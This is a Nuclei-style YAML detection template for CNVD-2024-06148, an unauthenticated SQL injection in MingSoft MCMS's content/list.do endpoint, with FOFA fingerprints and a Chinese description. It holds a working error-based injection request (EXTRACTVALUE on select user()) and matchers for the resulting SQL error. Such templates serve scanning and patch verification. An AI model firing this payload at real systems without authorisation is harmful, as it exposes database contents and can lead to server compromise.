id: CNVD-2024-06148

info:
  name: 铭飞CMS SQL注入漏洞(CNVD-2024-06148)
  author: Superhero
  severity: high
  description: |-
    fofa: body="铭飞MCMS" || body="/mdiy/formData/save.do" || body="static/plugins/ms/1.0.0/ms.js"
    由于铭飞CMS 文章列表接口content/list.do中的sqlWhere参数缺少对外部输入SQL语句的验证，未经身份验证的攻击者可利用该漏洞获取数据库敏感数据，进一步利用可获取服务器权限。
  reference:
    - https://blog.csdn.net/m0_60571842/article/details/140300863
  tags: 铭飞MCMS



http:
  - raw:
      - |
        POST /cms/content/list.do HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        sqlWhere=[{"action"%3a"","field"%3a"1+AND+EXTRACTVALUE(4095,CONCAT(0x7e,(select user()),0x7e))","el":"eq","model":"contentTitle","name":"123","type":"input","value":"a"}]

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'java.sql.SQLException: XPATH'
          
      - type: status
        status: 
          - 500